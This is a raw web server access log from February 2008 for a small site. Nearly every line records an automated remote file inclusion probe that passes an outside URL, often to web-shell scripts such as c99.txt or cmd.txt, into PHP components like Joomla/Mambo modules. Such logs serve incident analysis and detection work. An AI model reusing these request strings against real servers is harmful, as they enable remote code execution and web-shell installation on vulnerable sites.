80.53.69.10 - - [03/Feb/2008:17:56:58 -0800] "GET /logs//modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://www.drivehq.com/web/hyp3r/a.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.toulouseangloexchange.com"
125.46.36.186 - - [03/Feb/2008:17:58:21 -0800] "GET /logs/access_071210.log//modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://www.gilmores.ie/modules/di?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
193.19.225.162 - - [03/Feb/2008:17:59:04 -0800] "GET /logs/access_080114.log//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.massmodes.xpg.com.br/www.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
193.19.225.162 - - [03/Feb/2008:17:59:04 -0800] "GET //components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.massmodes.xpg.com.br/www.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
193.19.225.162 - - [03/Feb/2008:17:59:04 -0800] "GET /logs//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.massmodes.xpg.com.br/www.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
70.85.98.2 - - [03/Feb/2008:18:00:03 -0800] "GET /logs/access.log/modules/My_eGallery/index.php?basepath=http://xdenguebds.iespana.es/sefe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
70.85.98.2 - - [03/Feb/2008:18:00:03 -0800] "GET /modules/My_eGallery/index.php?basepath=http://xdenguebds.iespana.es/sefe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
70.85.98.2 - - [03/Feb/2008:18:00:03 -0800] "GET /logs/modules/My_eGallery/index.php?basepath=http://xdenguebds.iespana.es/sefe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
70.85.98.2 - - [03/Feb/2008:18:01:56 -0800] "GET /logs/access_071231.log/modules/My_eGallery/index.php?basepath=http://xdenguebds.iespana.es/sefe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
66.79.168.42 - - [03/Feb/2008:18:03:24 -0800] "GET /logs/access_080107.log/components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://72.1.78.162/echow.txt?????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
193.19.225.162 - - [03/Feb/2008:18:03:57 -0800] "GET /logs/access_071224.log//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.massmodes.xpg.com.br/www.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
194.186.47.24 - - [03/Feb/2008:18:06:41 -0800] "GET /logs/access_071217.log/spamx/MTBlackList.Examine.class.php?_CONF[path]=http://aneuk.com/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
194.186.47.24 - - [03/Feb/2008:18:06:41 -0800] "GET /logs/spamx/MTBlackList.Examine.class.php?_CONF[path]=http://aneuk.com/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
194.186.47.24 - - [03/Feb/2008:18:08:24 -0800] "GET /logs/access.log/spamx/MTBlackList.Examine.class.php?_CONF[path]=http://aneuk.com/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
81.169.174.238 - - [03/Feb/2008:18:09:01 -0800] "GET /logs////////vwar/convert/mvcw.php?step=1&vwar_root=http://www.greytauctions.org/panji_tengkorak/scrol.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322)" "www.toulouseangloexchange.com"
81.169.174.238 - - [03/Feb/2008:18:09:01 -0800] "GET ////////vwar/convert/mvcw.php?step=1&vwar_root=http://www.greytauctions.org/panji_tengkorak/scrol.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.23; Mac_PowerPC)" "www.toulouseangloexchange.com"
80.237.148.55 - - [03/Feb/2008:18:09:12 -0800] "GET //skin/zero_vote/ask_password.php?dir=http://findonline.bravehost.com/safeon.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.toulouseangloexchange.com"
80.237.148.55 - - [03/Feb/2008:18:09:12 -0800] "GET /logs//skin/zero_vote/ask_password.php?dir=http://findonline.bravehost.com/safeon.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.toulouseangloexchange.com"
216.40.234.90 - - [03/Feb/2008:18:12:45 -0800] "GET //modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.blackjackclub.cl/borda3.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
193.205.186.244 - - [03/Feb/2008:18:15:59 -0800] "GET /?mosConfig_absolute_path=http://www.das-gruene-eckchen.de/wbblite/test.txt??? HTTP/1.1" 200 919 "-" "Mozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.7.12) Gecko/20050929" "www.toulouseangloexchange.com"
193.205.186.244 - - [03/Feb/2008:18:16:01 -0800] "GET /logs/?mosConfig_absolute_path=http://www.das-gruene-eckchen.de/wbblite/test.txt??? HTTP/1.1" 200 3369 "-" "Mozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.7.12) Gecko/20050929" "www.toulouseangloexchange.com"
213.219.244.8 - - [03/Feb/2008:18:16:11 -0800] "GET /logs/access.log/view.php?table=http://72.1.78.162/echow.txt?????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.toulouseangloexchange.com"
213.219.244.8 - - [03/Feb/2008:18:16:11 -0800] "GET /view.php?table=http://72.1.78.162/echow.txt?????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.toulouseangloexchange.com"
213.219.244.8 - - [03/Feb/2008:18:16:12 -0800] "GET /logs/view.php?table=http://72.1.78.162/echow.txt?????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.toulouseangloexchange.com"
74.52.227.90 - - [03/Feb/2008:18:21:31 -0800] "GET /logs/?mosConfig_absolute_path=http://casavie.net/hack/c99.txt?????? HTTP/1.1" 200 3369 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
74.52.227.90 - - [03/Feb/2008:18:21:31 -0800] "GET /?mosConfig_absolute_path=http://casavie.net/hack/c99.txt?????? HTTP/1.1" 200 919 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
77.222.131.65 - - [03/Feb/2008:18:23:24 -0800] "GET /index.php?option=com_joomlaxplorer=&mosConfig_absolute_path=http://translators.openfmi.net/MySeLf/cmd.do? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.toulouseangloexchange.com"
66.98.150.12 - - [03/Feb/2008:18:24:06 -0800] "GET /logs/access.log/amember/plugins/payment/secpay/secpay.inc.php?config%5Broot_dir%5D=http://www.koreacarcare.com/becommunity/conf/temp/safe.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
66.98.150.12 - - [03/Feb/2008:18:24:06 -0800] "GET /amember/plugins/payment/secpay/secpay.inc.php?config%5Broot_dir%5D=http://www.koreacarcare.com/becommunity/conf/temp/safe.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
66.98.150.12 - - [03/Feb/2008:18:24:07 -0800] "GET /logs/amember/plugins/payment/secpay/secpay.inc.php?config%5Broot_dir%5D=http://www.koreacarcare.com/becommunity/conf/temp/safe.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
89.32.54.6 - - [03/Feb/2008:18:31:41 -0800] "GET /logs/access_071119.log HTTP/1.1" 200 621005 "-" "piu4qodroyjpymWn yydqccopvdvo 4xjj" "www.toulouseangloexchange.com"
65.98.99.250 - - [03/Feb/2008:18:34:33 -0800] "GET //administrator/components/com_color/admin.color.php?mosConfig_live_site=http://www.spices.res.in/biotraineeship.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
77.222.131.65 - - [03/Feb/2008:18:36:15 -0800] "GET /logs/access_080114.log/index.php?option=com_joomlaxplorer=&mosConfig_absolute_path=http://translators.openfmi.net/MySeLf/cmd.do? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.toulouseangloexchange.com"
77.222.131.65 - - [03/Feb/2008:18:36:15 -0800] "GET /logs/index.php?option=com_joomlaxplorer=&mosConfig_absolute_path=http://translators.openfmi.net/MySeLf/cmd.do? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.toulouseangloexchange.com"
209.62.82.14 - - [03/Feb/2008:18:37:06 -0800] "GET /robots.txt HTTP/1.1" 404 275 "www.toulouseangloexchange.com" "Pingdom GIGRIB (http://www.pingdom.com)" "www.toulouseangloexchange.com"
209.62.82.14 - - [03/Feb/2008:18:37:06 -0800] "GET /robots.txt HTTP/1.1" 404 275 "www.toulouseangloexchange.com" "Pingdom GIGRIB (http://www.pingdom.com)" "www.toulouseangloexchange.com"
209.62.82.14 - - [03/Feb/2008:18:37:06 -0800] "GET /robots.txt HTTP/1.1" 404 275 "www.toulouseangloexchange.com" "Pingdom GIGRIB (http://www.pingdom.com)" "www.toulouseangloexchange.com"
209.62.82.14 - - [03/Feb/2008:18:37:06 -0800] "GET /robots.txt HTTP/1.1" 404 275 "www.toulouseangloexchange.com" "Pingdom GIGRIB (http://www.pingdom.com)" "www.toulouseangloexchange.com"
209.62.82.14 - - [03/Feb/2008:18:37:06 -0800] "GET /robots.txt HTTP/1.1" 404 275 "www.toulouseangloexchange.com" "Pingdom GIGRIB (http://www.pingdom.com)" "www.toulouseangloexchange.com"
209.62.82.14 - - [03/Feb/2008:18:37:06 -0800] "GET /robots.txt HTTP/1.1" 404 275 "www.toulouseangloexchange.com" "Pingdom GIGRIB (http://www.pingdom.com)" "www.toulouseangloexchange.com"
209.62.82.14 - - [03/Feb/2008:18:37:06 -0800] "GET /robots.txt HTTP/1.1" 404 275 "www.toulouseangloexchange.com" "Pingdom GIGRIB (http://www.pingdom.com)" "www.toulouseangloexchange.com"
209.62.82.14 - - [03/Feb/2008:18:37:06 -0800] "GET /robots.txt HTTP/1.1" 404 275 "www.toulouseangloexchange.com" "Pingdom GIGRIB (http://www.pingdom.com)" "www.toulouseangloexchange.com"
65.98.99.250 - - [03/Feb/2008:18:37:15 -0800] "GET /logs/access_080121.log//administrator/components/com_color/admin.color.php?mosConfig_live_site=http://www.spices.res.in/biotraineeship.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
65.98.99.250 - - [03/Feb/2008:18:37:15 -0800] "GET /logs//administrator/components/com_color/admin.color.php?mosConfig_live_site=http://www.spices.res.in/biotraineeship.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
216.40.234.90 - - [03/Feb/2008:18:38:52 -0800] "GET /akocomments.php?mosConfig_absolute_path=http://www.blackjackclub.cl/borda3.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
66.79.168.42 - - [03/Feb/2008:18:39:08 -0800] "GET /logs/access.log/view.php?table=http://72.1.78.162/echow.txt?????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
66.79.168.42 - - [03/Feb/2008:18:39:08 -0800] "GET /view.php?table=http://72.1.78.162/echow.txt?????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
66.79.168.42 - - [03/Feb/2008:18:39:08 -0800] "GET /logs/view.php?table=http://72.1.78.162/echow.txt?????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
209.62.82.14 - - [03/Feb/2008:18:39:42 -0800] "GET / HTTP/1.1" 200 919 "http://www.pingdom.com/tools/fpt/?url=www.toulouseangloexchange.com" "Pingdom GIGRIB (http://www.pingdom.com)" "www.toulouseangloexchange.com"
209.62.82.14 - - [03/Feb/2008:18:39:42 -0800] "GET / HTTP/1.1" 200 919 "http://www.pingdom.com/tools/fpt/?url=www.toulouseangloexchange.com" "Pingdom GIGRIB (http://www.pingdom.com)" "www.toulouseangloexchange.com"
209.62.82.14 - - [03/Feb/2008:18:39:42 -0800] "GET / HTTP/1.1" 200 919 "http://www.pingdom.com/tools/fpt/?url=www.toulouseangloexchange.com" "Pingdom GIGRIB (http://www.pingdom.com)" "www.toulouseangloexchange.com"
209.62.82.14 - - [03/Feb/2008:18:39:42 -0800] "GET / HTTP/1.1" 200 919 "http://www.pingdom.com/tools/fpt/?url=www.toulouseangloexchange.com" "Pingdom GIGRIB (http://www.pingdom.com)" "www.toulouseangloexchange.com"
209.62.82.14 - - [03/Feb/2008:18:39:42 -0800] "GET / HTTP/1.1" 200 919 "http://www.pingdom.com/tools/fpt/?url=www.toulouseangloexchange.com" "Pingdom GIGRIB (http://www.pingdom.com)" "www.toulouseangloexchange.com"
209.62.82.14 - - [03/Feb/2008:18:39:42 -0800] "GET / HTTP/1.1" 200 919 "http://www.pingdom.com/tools/fpt/?url=www.toulouseangloexchange.com" "Pingdom GIGRIB (http://www.pingdom.com)" "www.toulouseangloexchange.com"
209.62.82.14 - - [03/Feb/2008:18:39:42 -0800] "GET / HTTP/1.1" 200 919 "http://www.pingdom.com/tools/fpt/?url=www.toulouseangloexchange.com" "Pingdom GIGRIB (http://www.pingdom.com)" "www.toulouseangloexchange.com"
209.62.82.14 - - [03/Feb/2008:18:39:42 -0800] "GET / HTTP/1.1" 200 919 "http://www.pingdom.com/tools/fpt/?url=www.toulouseangloexchange.com" "Pingdom GIGRIB (http://www.pingdom.com)" "www.toulouseangloexchange.com"
85.17.209.50 - - [03/Feb/2008:18:39:43 -0800] "GET //modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://www.naimaa.com/templates/r00t/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
67.91.198.51 - - [03/Feb/2008:18:42:14 -0800] "GET /logs/access_080114.log//index.php?option=com_weblinks&Itemid=4/index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.toulouseangloexchange.com"
85.17.209.50 - - [03/Feb/2008:18:42:41 -0800] "GET /logs/access_071126.log//modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://www.naimaa.com/templates/r00t/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
85.17.209.50 - - [03/Feb/2008:18:42:41 -0800] "GET //modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://www.naimaa.com/templates/r00t/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
85.17.209.50 - - [03/Feb/2008:18:42:41 -0800] "GET /logs//modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://www.naimaa.com/templates/r00t/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
74.52.227.90 - - [03/Feb/2008:18:43:02 -0800] "GET /logs/access_071224.log/?mosConfig_absolute_path=http://casavie.net/hack/c99.txt?????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
74.52.227.90 - - [03/Feb/2008:18:44:16 -0800] "GET /logs/access_071217.log/?mosConfig_absolute_path=http://casavie.net/hack/c99.txt?????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
67.91.198.51 - - [03/Feb/2008:18:44:57 -0800] "GET /logs/access_080114.log//index.php?option=com_weblinks&Itemid=4/index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.toulouseangloexchange.com"
67.91.198.51 - - [03/Feb/2008:18:45:19 -0800] "GET /logs/access_080114.log//index.php?option=com_weblinks&Itemid=4/index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.toulouseangloexchange.com"
80.237.148.55 - - [03/Feb/2008:18:45:51 -0800] "GET /logs/access_071105.log//skin/zero_vote/ask_password.php?dir=http://findonline.bravehost.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.toulouseangloexchange.com"
80.237.148.55 - - [03/Feb/2008:18:45:52 -0800] "GET //skin/zero_vote/ask_password.php?dir=http://findonline.bravehost.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.toulouseangloexchange.com"
80.237.148.55 - - [03/Feb/2008:18:45:52 -0800] "GET /logs//skin/zero_vote/ask_password.php?dir=http://findonline.bravehost.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.toulouseangloexchange.com"
80.237.148.55 - - [03/Feb/2008:18:45:55 -0800] "GET /logs/access_071112.log//skin/zero_vote/ask_password.php?dir=http://findonline.bravehost.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.toulouseangloexchange.com"
85.17.209.50 - - [03/Feb/2008:18:48:30 -0800] "GET /logs/access_080107.log//modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://www.naimaa.com/templates/r00t/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
85.17.209.50 - - [03/Feb/2008:18:48:49 -0800] "GET /logs/access_071217.log//modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://www.naimaa.com/templates/r00t/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
80.237.148.55 - - [03/Feb/2008:18:49:43 -0800] "GET /logs/access.log//projects/vw_files.php?dPconfig[root_dir]=http://findonline.bravehost.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.toulouseangloexchange.com"
80.237.148.55 - - [03/Feb/2008:18:49:44 -0800] "GET //projects/vw_files.php?dPconfig[root_dir]=http://findonline.bravehost.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.toulouseangloexchange.com"
80.237.148.55 - - [03/Feb/2008:18:49:44 -0800] "GET /logs//projects/vw_files.php?dPconfig[root_dir]=http://findonline.bravehost.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.toulouseangloexchange.com"
85.17.209.50 - - [03/Feb/2008:18:52:41 -0800] "GET /logs/access_071224.log//modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://www.naimaa.com/templates/r00t/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
82.94.221.121 - - [03/Feb/2008:18:52:54 -0800] "GET /logs//tools/send_reminders.php?noSet=0&includedir=http://ineal.biz/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.toulouseangloexchange.com"
82.94.221.121 - - [03/Feb/2008:18:52:54 -0800] "GET //tools/send_reminders.php?noSet=0&includedir=http://ineal.biz/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.toulouseangloexchange.com"
138.102.82.2 - - [03/Feb/2008:18:53:38 -0800] "GET /logs/access.log//templates/headline_temp.php?nst_inc=http://www.gumgangfarm.com/shop/data/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.toulouseangloexchange.com"
138.102.82.2 - - [03/Feb/2008:18:53:38 -0800] "GET //templates/headline_temp.php?nst_inc=http://www.gumgangfarm.com/shop/data/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.toulouseangloexchange.com"
138.102.82.2 - - [03/Feb/2008:18:53:38 -0800] "GET /logs//templates/headline_temp.php?nst_inc=http://www.gumgangfarm.com/shop/data/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.toulouseangloexchange.com"
138.102.82.2 - - [03/Feb/2008:18:53:38 -0800] "GET /logs/access_071231.log//templates/headline_temp.php?nst_inc=http://www.gumgangfarm.com/shop/data/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.toulouseangloexchange.com"
216.40.234.90 - - [03/Feb/2008:18:54:40 -0800] "GET /logs/access.log/akocomments.php?mosConfig_absolute_path=http://www.blackjackclub.cl/borda3.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
216.40.234.90 - - [03/Feb/2008:18:54:40 -0800] "GET /logs/akocomments.php?mosConfig_absolute_path=http://www.blackjackclub.cl/borda3.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
205.234.98.61 - - [03/Feb/2008:18:54:55 -0800] "GET //templates/headline_temp.php?nst_inc=http://64.22.125.219/r0x/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
138.102.82.2 - - [03/Feb/2008:18:55:34 -0800] "GET //templates/headline_temp.php?nst_inc=http://www.gumgangfarm.com/shop/data/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.toulouseangloexchange.com"
88.109.7.133 - - [03/Feb/2008:18:56:10 -0800] "GET /logs/access_080121.log//logs//index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://merkanet.mine.nu/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
88.109.7.133 - - [03/Feb/2008:18:56:10 -0800] "GET //logs//index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://merkanet.mine.nu/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
88.109.7.133 - - [03/Feb/2008:18:56:11 -0800] "GET /logs//logs//index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://merkanet.mine.nu/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
216.40.234.90 - - [03/Feb/2008:18:56:11 -0800] "GET /logs/access_071210.log/akocomments.php?mosConfig_absolute_path=http://www.blackjackclub.cl/borda3.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
88.109.7.133 - - [03/Feb/2008:18:56:29 -0800] "GET /logs/access_071224.log//logs//index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://merkanet.mine.nu/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
205.234.98.61 - - [03/Feb/2008:18:56:29 -0800] "GET /logs/access.log//templates/headline_temp.php?nst_inc=http://64.22.125.219/r0x/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
205.234.98.61 - - [03/Feb/2008:18:56:29 -0800] "GET //templates/headline_temp.php?nst_inc=http://64.22.125.219/r0x/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
205.234.98.61 - - [03/Feb/2008:18:56:29 -0800] "GET /logs//templates/headline_temp.php?nst_inc=http://64.22.125.219/r0x/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
205.234.98.61 - - [03/Feb/2008:18:56:32 -0800] "GET /logs/access_071231.log//templates/headline_temp.php?nst_inc=http://64.22.125.219/r0x/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
138.102.82.2 - - [03/Feb/2008:18:58:37 -0800] "GET /logs/%3Cwbr%20/%3Eaccess.log//templates/headline_temp.php?nst_inc=http://www.gumgangfarm.com/shop/data/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.toulouseangloexchange.com"
138.102.82.2 - - [03/Feb/2008:18:58:37 -0800] "GET //templates/headline_temp.php?nst_inc=http://www.gumgangfarm.com/shop/data/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.toulouseangloexchange.com"
138.102.82.2 - - [03/Feb/2008:18:58:37 -0800] "GET /logs/%3Cwbr%20//templates/headline_temp.php?nst_inc=http://www.gumgangfarm.com/shop/data/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.toulouseangloexchange.com"
138.102.82.2 - - [03/Feb/2008:18:58:45 -0800] "GET /logs/%3Cwbr%20/%3Eaccess_071231.log//templates/headline_temp.php?nst_inc=http://www.gumgangfarm.com/shop/data/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.toulouseangloexchange.com"
69.50.243.66 - - [03/Feb/2008:19:00:21 -0800] "GET /logs/access.log//templates/headline_temp.php?nst_inc=http://www.gumgangfarm.com/shop/data/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
69.50.243.66 - - [03/Feb/2008:19:00:22 -0800] "GET //templates/headline_temp.php?nst_inc=http://www.gumgangfarm.com/shop/data/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
69.50.243.66 - - [03/Feb/2008:19:00:22 -0800] "GET /logs//templates/headline_temp.php?nst_inc=http://www.gumgangfarm.com/shop/data/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
69.50.243.66 - - [03/Feb/2008:19:00:52 -0800] "GET /logs/access_071231.log//templates/headline_temp.php?nst_inc=http://www.gumgangfarm.com/shop/data/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
88.109.7.133 - - [03/Feb/2008:19:02:54 -0800] "GET /logs/access.log//logs/akocomments.php?mosConfig_absolute_path=http://merkanet.mine.nu/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
88.109.7.133 - - [03/Feb/2008:19:02:54 -0800] "GET //logs/akocomments.php?mosConfig_absolute_path=http://merkanet.mine.nu/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
88.109.7.133 - - [03/Feb/2008:19:02:54 -0800] "GET /logs//logs/akocomments.php?mosConfig_absolute_path=http://merkanet.mine.nu/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
88.109.7.133 - - [03/Feb/2008:19:03:28 -0800] "GET /logs/access_071224.log//logs/akocomments.php?mosConfig_absolute_path=http://merkanet.mine.nu/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
217.31.58.88 - - [03/Feb/2008:19:04:43 -0800] "GET /logs/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://h1.ripway.com/credo/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.17; Mac_PowerPC)" "www.toulouseangloexchange.com"
217.31.58.88 - - [03/Feb/2008:19:04:43 -0800] "GET /modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://h1.ripway.com/credo/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.17; Mac_PowerPC)" "www.toulouseangloexchange.com"
88.109.7.133 - - [03/Feb/2008:19:05:46 -0800] "GET /logs/access.log//akocomments.php?mosConfig_absolute_path=http://merkanet.mine.nu/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
88.109.7.133 - - [03/Feb/2008:19:05:47 -0800] "GET //akocomments.php?mosConfig_absolute_path=http://merkanet.mine.nu/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
